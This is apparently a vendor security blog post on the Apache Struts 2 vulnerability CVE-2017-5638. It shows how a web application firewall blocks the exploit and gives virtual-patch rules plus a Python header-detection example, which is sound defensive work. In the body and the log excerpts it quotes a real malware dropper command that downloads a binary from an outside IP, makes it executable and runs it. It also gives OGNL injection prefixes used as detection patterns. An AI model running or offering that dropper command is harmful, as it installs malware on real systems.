Channel: Symantec Connect - Blog Entries

Symantec WAF and Remote Code Execution & Command Injection in Apache Struts 2


Summary

Apache Struts is a popular open-source MVC web application framework for Java-based web applications. A recently announced 0-day security vulnerability (CVE-2017-5638) against this framework is being actively exploited. It impacts the Jakarta-based multipart parser used in Struts 2.

Exploitation attempts that deliver remote code execution and command injection payloads have been identified.

The Symantec Web Application Firewall solution leverages a unique Content Nature Detection approach that is able to correctly identify CVE-2017-5638 attacks without requiring a signature update or virtual patch. Symantec Web Application Firewall (WAF) customers are protected by default, and no additional action is required.

Attack

There are many POC attack payloads flooding the web, including this exploit in the Metasploit Framework: https://github.com/rapid7/metasploit-framework/issues/8064. For our analysis we will use the Python script at the core of this exploit. When running the script against a vulnerable target:

[Figure Blog1.png: the exploit script run against the vulnerable target]

… the Wireshark packet capture shows the HTTP request being issued:

[Figure Blog2.png: Wireshark capture of the HTTP request issued by the script]

The response from the vulnerable server contains the output of the injected command, exactly as it would appear when run locally on the host. Command injection chaining allows for truly powerful exploitation variants, from simple "whoami" and "ls -l" sequences to sophisticated firewall and IDS disabling, as shown here.

Mitigation

Let’s deploy the Symantec Web Application Firewall (WAF) and observe how the attack is correctly detected and blocked. With the Symantec WAF deployed in front of the vulnerable Struts server, the following response is returned:

urllib2.HTTPError: HTTP Error 400: Bad Request

Note: The WAF is configured by default to return status 400 for blocked requests.

The WAF log for the request shows the Code Injection and Analytics Filter engines have identified the attack:

"Code Injection;Command Injection""[{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"},
{"eng":"analytics_filter","part":"header","rule":["AF-1006-3","AF-1006-20","AF-1006-21","AF-1006-52"],"data":"%{(#_='multipart…"}]"

The important aspect is that the Symantec WAF detected and blocked this attack without requiring a signature update. The log shows that our WAF correctly identifies the value of the Content-Type header as malicious and categorizes it as Code Injection and Command Injection. If the attacker wants to gain a foothold on the compromised machine, they might try a more elaborate Command Injection. For example, this nasty payload from the recently discovered Linux ARM ELF_IMEIJ.A malware:

wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1;

This attack is unusual in that it includes Java code in addition to a bash command sequence. Despite the payload modification, the Command Injection attack is detected correctly:

"Command Injection;Code Injection" 40 - "[{"eng":"injection.command","part":"header","host":"linux","version":"3","data":"%{(#_='multipart…#cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.command","part":"header","host":"osx","version":"3","data":"%{(#_='multipart…cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.code","part":"header","lang":"php","data":"%{(#_='multipart…"},
{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"}]" - - WAF_SCANNED

SYMC WAF Protection

The Symantec Web Application Firewall uses Content Nature Detection engines, which satisfy the need for strong detection capabilities in a scalable system capable of handling Enterprise-grade traffic profiles. It is a fundamental shift away from "known bad" pattern matching, and is instead based on understanding the nature of the content and how backend infrastructure components handle data.

Detecting and blocking well-known attacks is something that all modern WAFs do fairly well. Unfortunately, this does not represent the real-world exploit payloads used by a sophisticated attacker. There is a continually evolving set of evasion techniques exposing fundamental processing holes in existing WAF technology.

The Symantec WAF addresses inherent flaws in the traditional signature-based pattern matching approach. The payloads for CVE-2017-5638 are blocked by default, without requiring a signature update or virtual patch. This greatly reduces the operational overhead associated with this type of vulnerability. Symantec WAF customers were also protected before this vulnerability was publicly disclosed.


Conclusion

Systems leveraging the Jakarta-based multipart parser used in Apache Struts 2 are advised to update to v2.3.32+ or v2.5.10.1+.

Symantec WAF customers are protected by default, and do not require a signature update or virtual patch for protection.

Existing ProxySG customers who are not running WAF controls can deploy a virtual patch in policy for immediate protection. For example:

; ProxySG 6.5.x
<proxy>
request.header.Content-Type.substring="%{(#" force_exception(invalid_request)

; ProxySG 6.6+
<proxy>
http.request.normalization.default("urlDecode:(path),urlDecode:(header),urlDecode:urlDecode:htmlEntityDecode:(arg_name,arg)")
<proxy>
http.request[header].substring="%{(#" force_exception(invalid_request)
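The following Python is an added example, not Symantec WAF or ProxySG code, illustrating the header check that both the WAF log entries above and the virtual patch are built around: any request header whose value contains the OGNL expression opener "%{(#" is rejected with the 400 verdict the post describes. It also shows why the 6.6+ policy decodes headers before matching: the same opener, URL-encoded once, slips past a raw substring comparison but not a normalized one. The sample requests are constructed, and the payload-shaped values keep only the prefix visible in the log above with the expression body replaced by a placeholder.

```python
"""Header-inspection check modelled on the ProxySG virtual patch above.

Added example, not Symantec WAF or ProxySG code. Sample requests are constructed.
"""
from urllib.parse import unquote

# Substring the virtual patch keys on: the start of an OGNL expression.
OGNL_MARKER = "%{(#"

# Constructed sample requests (header name -> value).
SAMPLE_REQUESTS = {
    "benign_upload": {
        "Content-Type": "multipart/form-data; boundary=----FormBoundary1234",
        "User-Agent": "Mozilla/5.0",
    },
    "ognl_in_content_type": {
        # Prefix seen in the WAF log; the expression body is a placeholder.
        "Content-Type": "%{(#_='multipart/form-data').(#placeholder='elided')}",
    },
    "url_encoded_ognl": {
        # Same opener, URL-encoded once: "%{(#" becomes "%25%7B%28%23".
        "Content-Type": "%25%7B%28%23_%3D%27multipart%2Fform-data%27%29%7D",
    },
}


def normalize_header(value: str) -> str:
    """Mirror the urlDecode:(header) step of the 6.6+ normalization rule."""
    return unquote(value)


def inspect_request(headers: dict, decode: bool = True) -> dict:
    """Check every header, like http.request[header] in the 6.6+ rule.

    decode=False behaves like the 6.5.x rule as written above, which has no
    normalization step and so compares the raw header value.
    """
    for name, raw in headers.items():
        value = normalize_header(raw) if decode else raw
        if OGNL_MARKER in value:
            return {
                "block": True,
                "status": 400,               # default blocked-request status in the post
                "header": name,
                "data": value[:24] + "...",  # truncated like the "data" field in the log
            }
    return {"block": False, "status": None, "header": None, "data": None}


def log_entry(verdict: dict) -> dict:
    """Shape a blocked verdict like one element of the WAF log array above."""
    return {"eng": "injection.code", "part": "header", "data": verdict["data"]}


if __name__ == "__main__":
    for label, headers in SAMPLE_REQUESTS.items():
        v = inspect_request(headers)
        print(f"{label:22s} block={v['block']} status={v['status']} header={v['header']}")
        if v["block"]:
            print("  log:", log_entry(v))
```

Run stand-alone, the benign upload passes, the payload-shaped Content-Type is blocked, and the URL-encoded variant is blocked only when decoding is on, which is the practical reason the 6.6+ policy sets `http.request.normalization.default` before the substring rule.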